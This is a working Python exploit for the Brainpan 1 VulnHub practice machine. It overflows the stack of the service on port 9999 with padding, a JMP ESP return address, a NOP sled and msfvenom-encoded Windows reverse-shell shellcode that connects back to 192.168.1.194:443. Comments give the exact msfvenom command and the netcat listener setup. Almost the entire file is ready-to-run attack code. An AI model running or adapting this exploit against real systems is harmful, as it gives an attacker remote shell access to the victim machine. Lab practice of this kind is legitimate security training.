#!/usr/bin/python
import sys,socket
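# Brainpan 1 (VulnHub) - stack buffer overflow in the service on TCP/9999.
# 524 bytes of padding reach the saved return address, the next four bytes
# overwrite EIP with a JMP ESP gadget, and execution lands on the NOP sled and
# shellcode that follow on the stack.  Written to run under Python 2 or 3
# (bytes literals, print() with a single argument).

# JMP ESP address 0x311712F3, packed little-endian.  It is only valid for the
# exact target binary this was built against; re-verify the gadget (e.g. with
# mona) before reusing the script on a different build.
esp = b"\xF3\x12\x17\x31"
# Small sled in front of the shellcode; presumably headroom for the
# shikata_ga_nai decoder stub, which works near ESP - TODO confirm.
nops = b"\x90" * 16
# windows/shell_reverse_tcp back to LHOST:LPORT from the msfvenom line below.
# A listener (e.g. `nc -lvnp 443`) must be up on 192.168.1.194 before the
# payload is sent.  Bad characters \x00 \x0a \x0d were excluded when encoding;
# EXITFUNC=thread ends only the hijacked thread when the shell exits.
shellcode = b""
shellcode += b"\xda\xdf\xd9\x74\x24\xf4\xb8\x34\xec\x2c\xdd\x5b"
shellcode += b"\x31\xc9\xb1\x52\x31\x43\x17\x83\xc3\x04\x03\x77"
shellcode += b"\xff\xce\x28\x8b\x17\x8c\xd3\x73\xe8\xf1\x5a\x96"
shellcode += b"\xd9\x31\x38\xd3\x4a\x82\x4a\xb1\x66\x69\x1e\x21"
shellcode += b"\xfc\x1f\xb7\x46\xb5\xaa\xe1\x69\x46\x86\xd2\xe8"
shellcode += b"\xc4\xd5\x06\xca\xf5\x15\x5b\x0b\x31\x4b\x96\x59"
shellcode += b"\xea\x07\x05\x4d\x9f\x52\x96\xe6\xd3\x73\x9e\x1b"
shellcode += b"\xa3\x72\x8f\x8a\xbf\x2c\x0f\x2d\x13\x45\x06\x35"
shellcode += b"\x70\x60\xd0\xce\x42\x1e\xe3\x06\x9b\xdf\x48\x67"
shellcode += b"\x13\x12\x90\xa0\x94\xcd\xe7\xd8\xe6\x70\xf0\x1f"
shellcode += b"\x94\xae\x75\xbb\x3e\x24\x2d\x67\xbe\xe9\xa8\xec"
shellcode += b"\xcc\x46\xbe\xaa\xd0\x59\x13\xc1\xed\xd2\x92\x05"
shellcode += b"\x64\xa0\xb0\x81\x2c\x72\xd8\x90\x88\xd5\xe5\xc2"
shellcode += b"\x72\x89\x43\x89\x9f\xde\xf9\xd0\xf7\x13\x30\xea"
shellcode += b"\x07\x3c\x43\x99\x35\xe3\xff\x35\x76\x6c\x26\xc2"
shellcode += b"\x79\x47\x9e\x5c\x84\x68\xdf\x75\x43\x3c\x8f\xed"
shellcode += b"\x62\x3d\x44\xed\x8b\xe8\xcb\xbd\x23\x43\xac\x6d"
shellcode += b"\x84\x33\x44\x67\x0b\x6b\x74\x88\xc1\x04\x1f\x73"
shellcode += b"\x82\xea\x48\x7a\x90\x83\x8a\x7c\x15\xef\x02\x9a"
shellcode += b"\x7f\x1f\x43\x35\xe8\x86\xce\xcd\x89\x47\xc5\xa8"
shellcode += b"\x8a\xcc\xea\x4d\x44\x25\x86\x5d\x31\xc5\xdd\x3f"
shellcode += b"\x94\xda\xcb\x57\x7a\x48\x90\xa7\xf5\x71\x0f\xf0"
shellcode += b"\x52\x47\x46\x94\x4e\xfe\xf0\x8a\x92\x66\x3a\x0e"
shellcode += b"\x49\x5b\xc5\x8f\x1c\xe7\xe1\x9f\xd8\xe8\xad\xcb"
shellcode += b"\xb4\xbe\x7b\xa5\x72\x69\xca\x1f\x2d\xc6\x84\xf7"
shellcode += b"\xa8\x24\x17\x81\xb4\x60\xe1\x6d\x04\xdd\xb4\x92"
shellcode += b"\xa9\x89\x30\xeb\xd7\x29\xbe\x26\x5c\x49\x5d\xe2"
shellcode += b"\xa9\xe2\xf8\x67\x10\x6f\xfb\x52\x57\x96\x78\x56"
shellcode += b"\x28\x6d\x60\x13\x2d\x29\x26\xc8\x5f\x22\xc3\xee"
shellcode += b"\xcc\x43\xc6"
#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.1.194 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode

# Bytes of padding before the saved return address is overwritten.
EIP_OFFSET = 524
# Target used when no host/port is given on the command line.
DEFAULT_HOST = '192.168.1.100'
DEFAULT_PORT = 9999
# Seconds to wait on connect/recv; once the shellcode runs the service no
# longer answers on this socket, so the final recv() would otherwise block forever.
SOCKET_TIMEOUT = 10


def build_payload():
    """Return the overflow buffer: padding + JMP ESP + NOP sled + shellcode."""
    return b"A" * EIP_OFFSET + esp + nops + shellcode


def main(argv=None):
    """Deliver the payload to the target and print what the service sends back.

    Usage: brainpan1-shell.py [host [port]]; defaults to 192.168.1.100:9999.
    Raises socket.error (and ValueError on a non-numeric port) to the caller.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else DEFAULT_HOST
    port = int(args[1]) if len(args) > 1 else DEFAULT_PORT

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(SOCKET_TIMEOUT)
    try:
        sock.connect((host, port))
        # Banner/prompt the service prints on connect.
        print(sock.recv(1024))
        # sendall(): a plain send() may hand over only part of the buffer.
        sock.sendall(build_payload())
        try:
            print(sock.recv(1024))
        except socket.timeout:
            print("no reply within %ds - check the reverse-shell listener" % SOCKET_TIMEOUT)
    finally:
        # Always release the socket, even if connect()/recv() raised.
        sock.close()


if __name__ == "__main__":
    main()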